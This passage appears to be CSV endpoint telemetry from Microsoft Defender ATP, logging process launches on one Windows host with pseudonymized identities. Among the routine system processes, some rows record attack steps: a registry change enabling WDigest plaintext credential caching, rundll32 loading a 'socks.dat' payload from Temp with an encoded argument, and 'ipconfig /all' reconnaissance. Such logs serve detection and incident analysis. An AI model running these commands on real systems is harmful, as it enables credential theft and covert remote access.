03:49:54.083880800+00:00,2992,cmd.exe,"""cmd.exe"" /c ""reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f""",True,2021-06-23 03:31:13.489936600+00:00,12940,\Device\HarddiskVolume3\Windows\System32\cmd.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:49:54.930352300+00:00,2021-06-23 03:52:07.523359900+00:00,464de982-c789-4210-b3cb-004f2a79f9af,computerpii_0a470890c60768167990033d701e7bd881398861,162060,False,10.7740.19041.1052,False,11540474045173252,,11540474045173253,2021-06-23 03:49:54.083880800+00:00,2992,2021-06-23 03:49:54.083880800+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,2992,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,reg.exe,reg.exe,Registry Console Tool
+1214,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:07:27.241567+00:00,10716,cmd.exe,"""cmd.exe"" /c ""ipconfig /all""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:01:01.746618400+00:00,13732,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",False,2021-06-24 00:59:43.689127700+00:00,9244,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:07:27.263420500+00:00,2021-06-24 07:10:14.450021400+00:00,7c50b904-81d6-41a3-8906-52b4e29d16df,computerpii_0a470890c60768167990033d701e7bd881398861,176871,False,10.7740.19041.1052,False,11540474045175422,,11540474045177020,2021-06-24 01:01:01.746618400+00:00,13732,2021-06-24 01:01:01.746618400+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,13732,16512,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-24 00:54:21.245734700+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,1.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1215,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:07:27.255243500+00:00,18212,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 07:07:27.241567+00:00,10716,cmd.exe,"""cmd.exe"" /c ""ipconfig /all""",False,2021-06-24 01:01:01.746618400+00:00,13732,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:07:27.263720100+00:00,2021-06-24 07:10:14.450117200+00:00,4ff252ae-f3ef-41a3-9482-df9fbe892d6f,computerpii_0a470890c60768167990033d701e7bd881398861,176872,False,10.7740.19041.1052,False,11540474045177020,,11540474045177021,2021-06-24 07:07:27.241567+00:00,10716,2021-06-24 07:07:27.241567+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,10716,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 06:26:14.590206500+00:00,2021-02-17 04:34:58.875918800+00:00,16512,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,257.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1216,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:07:27.309517+00:00,17160,ipconfig.exe,ipconfig  /all,PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\ipconfig.exe,35840,62f170fb07fdbb79ceb7147101406eb8,53e000f5aa9b3a00934319db8080bb99cb323bf48fc628a64f75d7847c265606,d9bbb4e4900ff03b0486fac32768170249dad82d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 07:07:27.241567+00:00,10716,cmd.exe,"""cmd.exe"" /c ""ipconfig /all""",False,2021-06-24 01:01:01.746618400+00:00,13732,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:07:27.853189900+00:00,2021-06-24 07:10:14.450197500+00:00,3d2dcda1-54a3-4bc8-9522-9a1afcd372fc,computerpii_0a470890c60768167990033d701e7bd881398861,176873,False,10.7740.19041.1052,False,11540474045177020,,11540474045177022,2021-06-24 07:07:27.241567+00:00,10716,2021-06-24 07:07:27.241567+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,10716,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 06:26:14.590206500+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,257.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,ipconfig.exe,ipconfig.exe,IP Configuration Utility
+1217,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 08:15:28.835473200+00:00,5220,SecurityHealthHost.exe,SecurityHealthHost.exe {08728914-3F57-4D52-9E31-49DAECA5A80A} -Embedding,PortableExecutable,2021-05-12 01:12:35.767997400+00:00,C:\Windows\System32\SecurityHealthHost.exe,98120,76a2df6d331bca4a01715c369ab81603,4a56edeb0f1b6ede1d1b292dad034757da7f481435ae12c50482086d82a78904,89fb1c4fb8f0b648acccd946798647f7b2a84aeb,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:15:29.001079500+00:00,2021-06-24 08:17:39.129729200+00:00,1438a681-440f-47bd-9535-2fa33d046ebf,computerpii_0a470890c60768167990033d701e7bd881398861,177560,False,10.7740.19041.1052,False,11540474045136908,,11540474045177296,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.1907.16384,SecurityHealthHost,SecurityHealthHost.exe,Windows Security Health Host
+1218,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:58:18.741209900+00:00,13940,SenseIR.exe,"""SenseIR.exe"" ""OnlineSenseIR"" ""4008"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:58:19.040750500+00:00,2021-06-23 04:00:29.319047200+00:00,d9f8d3bb-e9ae-4930-8460-ce1cddd1dccf,computerpii_0a470890c60768167990033d701e7bd881398861,162281,False,10.7740.19041.1052,False,11540474045137006,,11540474045173295,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+1219,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:00:01.295340300+00:00,19060,hvsievaluator.exe,hvsievaluator.exe CSP,PortableExecutable,2021-03-11 01:07:46.354372700+00:00,C:\Windows\System32\hvsievaluator.exe,160056,fe0c06bd45cb8e86f045762c075d93f9,ea55dfabb7a47bd450ed3050f88e3b6a64fdc0b918b93211aaf35a430d3648cc,acb0db6d7cdcbc3c2481ee383c891c4d987cdd26,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:00:02.028276500+00:00,2021-06-23 04:00:29.319573900+00:00,a664b501-3e36-42dc-8537-86fb1cfee038,computerpii_0a470890c60768167990033d701e7bd881398861,162293,False,10.7740.19041.1052,False,11540474045136925,,11540474045173301,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,HvsiEvaluator.exe,HvsiEvaluator.exe,Microsoft Defender Application Guard Policy Evaluator
+1220,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:00:01.310646800+00:00,12292,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,fe0c06bd45cb8e86f045762c075d93f9,ea55dfabb7a47bd450ed3050f88e3b6a64fdc0b918b93211aaf35a430d3648cc,acb0db6d7cdcbc3c2481ee383c891c4d987cdd26,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 04:00:01.295340300+00:00,19060,hvsievaluator.exe,hvsievaluator.exe CSP,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:00:02.029227100+00:00,2021-06-23 04:00:29.319620900+00:00,500fe4b3-7745-4a3c-a685-f279d25d311f,computerpii_0a470890c60768167990033d701e7bd881398861,162294,False,10.7740.19041.1052,False,11540474045173301,,11540474045173302,2021-06-23 04:00:01.295340300+00:00,19060,2021-06-23 04:00:01.295340300+00:00,\Device\HarddiskVolume3\Windows\System32\hvsievaluator.exe,19060,18560,TerminateProcessStartkey,C:\Windows\System32,160056,2002-02-28 19:06:36+00:00,2021-03-11 01:07:46.363801100+00:00,2021-06-23 04:00:01.309450500+00:00,2021-03-11 01:07:46.354372700+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,HvsiEvaluator.exe,HvsiEvaluator.exe,Microsoft Defender Application Guard Policy Evaluator,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1221,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 02:15:43.501587800+00:00,5488,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe859_ Global\UsGthrCtrlFltPipeMssGthrPipe859 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:15:43.571166900+00:00,2021-06-25 02:17:06.755805300+00:00,b874f33a-aa1f-401d-9d1f-20113488af2a,computerpii_0a470890c60768167990033d701e7bd881398861,185332,False,10.7740.19041.1052,False,11540474045144190,,11540474045179021,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,SearchIndexer.exe,4660,256,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1222,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:23.241826600+00:00,10352,msedge.exe,"""msedge.exe"" --type=gpu-process --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=39745 --gpu-sub-system-id=161484840 --gpu-revision=2 --gpu-driver-version=27.20.100.8336 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3016 /prefetch:2",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:23.283265800+00:00,2021-06-25 00:43:12.881763200+00:00,f22f2813-414c-44d1-b42f-e629f98dd705,computerpii_0a470890c60768167990033d701e7bd881398861,181498,True,10.7740.19041.1052,False,11540474045178212,,11540474045178317,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1223,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:28.121969300+00:00,8652,FullTrustNotifier.exe,"""FullTrustNotifier.exe"" GetChannelUri",PortableExecutable,2020-10-22 07:42:28+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\FullTrustNotifier.exe,218608,5236a3cd1fc50ea204f57c9f66787dc6,79f2749d62da14edd4b797d0af539e996841c237795932c299b847bb7d2cd159,ba01717f097852cd19729f5e3146076d12bcc5c7,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.930630900+00:00,17592,AdobeCollabSync.exe,"""AdobeCollabSync.exe""  --type=collab-renderer --proc=15292",False,2021-06-25 00:39:22.820318500+00:00,15292,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:28.200235300+00:00,2021-06-25 00:43:12.881855+00:00,38f74b73-833c-403a-a90c-eeba82fbfe39,computerpii_0a470890c60768167990033d701e7bd881398861,181500,False,10.7740.19041.1052,False,11540474045178217,,11540474045178321,2021-06-25 00:39:22.930630900+00:00,17592,2021-06-25 00:39:22.930630900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,17592,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-25 00:39:22.829754+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1224,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:28.524825100+00:00,9044,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_xdjlfm 3",PortableExecutable,2018-05-11 03:50:54+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,3548360,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.806850600+00:00,4476,AGSService.exe,"""AGSService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:28.563640400+00:00,2021-06-25 